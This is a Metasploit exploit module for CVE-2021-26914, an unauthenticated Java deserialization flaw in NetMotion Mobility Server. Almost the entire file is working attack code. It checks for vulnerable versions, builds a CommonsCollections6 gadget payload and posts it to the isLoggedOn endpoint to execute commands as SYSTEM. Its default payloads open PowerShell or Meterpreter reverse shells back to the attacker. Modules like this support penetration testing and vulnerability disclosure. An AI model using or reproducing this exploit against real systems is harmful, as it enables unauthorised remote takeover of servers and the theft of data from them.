NetMotion Mobility Server MvcUtil Java Deserialization Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::JavaDeserialization
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NetMotion Mobility Server MvcUtil Java Deserialization',
        'Description' => %q{
          This module exploits an unauthenticated Java deserialization in the
          NetMotion Mobility server's MvcUtil.valueStringToObject() method, as
          invoked through the /mobility/Menu/isLoggedOn endpoint, to execute
          code as the SYSTEM account.

          Mobility server versions 11.x before 11.73 and 12.x before 12.02 are
          vulnerable. Tested against 12.01.09045 on Windows Server 2016.
        },
        'Author' => [
          'mr_me', # Discovery and PoC
          'wvu' # Module
        ],
        'References' => [
          ['CVE', '2021-26914'],
          ['URL', 'https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/'],
          ['URL', 'https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020'],
          ['URL', 'https://srcincite.io/advisories/src-2021-0007/']
        ],
        'DisclosureDate' => '2021-02-08', # Public disclosure
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          [
            'Command',
            {
              'Arch' => ARCH_CMD,
              'Type' => :cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :dropper,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
              }
            }
          ],
          [
            'PowerShell',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
              }
            }
          ]
        ],
        'DefaultTarget' => 2,
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [
            IOC_IN_LOGS, # C:\Program Files\NetMotion Server\logs
            ARTIFACTS_ON_DISK # CmdStager
          ]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path)
    )

    unless (version = parse_version(res))
      return CheckCode::Unknown('Failed to parse version from response.')
    end

    unless vuln_version?(version)
      return CheckCode::Safe("NetMotion Mobility #{version} is patched.")
    end

    CheckCode::Appears("NetMotion Mobility #{version} is unpatched.")
  end

  def parse_version(res)
    return unless res&.code == 200

    # <img src='/images/menu_logo.png?version=12.01.09045' alt='Mobility' border='0' class='navLogo'>
    res.get_html_document.at('//img[@alt = "Mobility"]/@src').to_s[
      %r{^/images/menu_logo\.png\?version=(?<version>[\d.]+)$},
      :version # Hat tip @adfoster-r7
    ]
  end

  def vuln_version?(version)
    @vuln_versions ||=
      (11.0...11.73).step(0.01) + # 11.0 through 11.72
      (12.0...12.02).step(0.01) # 12.0 through 12.01

    @vuln_versions.include?(version.to_f)
  end

  def exploit
    print_status("Executing #{payload_instance.refname} (#{target.name})")

    case target['Type']
    when :cmd
      execute_command(payload.encoded)
    when :dropper
      execute_cmdstager
    when :psh
      execute_command(
        cmd_psh_payload(
          payload.encoded,
          payload.arch.first,
          remove_comspec: true
        )
      )
    end
  end

  def execute_command(cmd, _opts = {})
    # XXX: %Path% is otherwise *only* C:\Program Files\NetMotion Server
    cmd.prepend(
      'set Path=%Path%;' \
      'C:\Windows\System32' \
      ';' \
      'C:\Windows\System32\WindowsPowerShell\v1.0' \
      '&&'
    )

    print_status('Triggering deserialization')
    vprint_status("Executing command: #{cmd}")

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/mobility/Menu/isLoggedOn'),
      'vars_post' => {
        'Mvc_x_Form_x_Name' => go_go_gadget(cmd)
      }
    )

    unless res&.code == 200 && res.body == 'false' # If JSESSIONID is missing
      fail_with(Failure::PayloadFailed, 'Failed to trigger deserialization')
    end

    print_good('Successfully triggered deserialization')
  end

  def go_go_gadget(cmd)
    Rex::Text.encode_base64(
      Rex::Text.gzip(
        generate_java_deserialization_for_command(
          'CommonsCollections6',
          'cmd', # cmd.exe
          cmd
        )
      )
    )
  end

end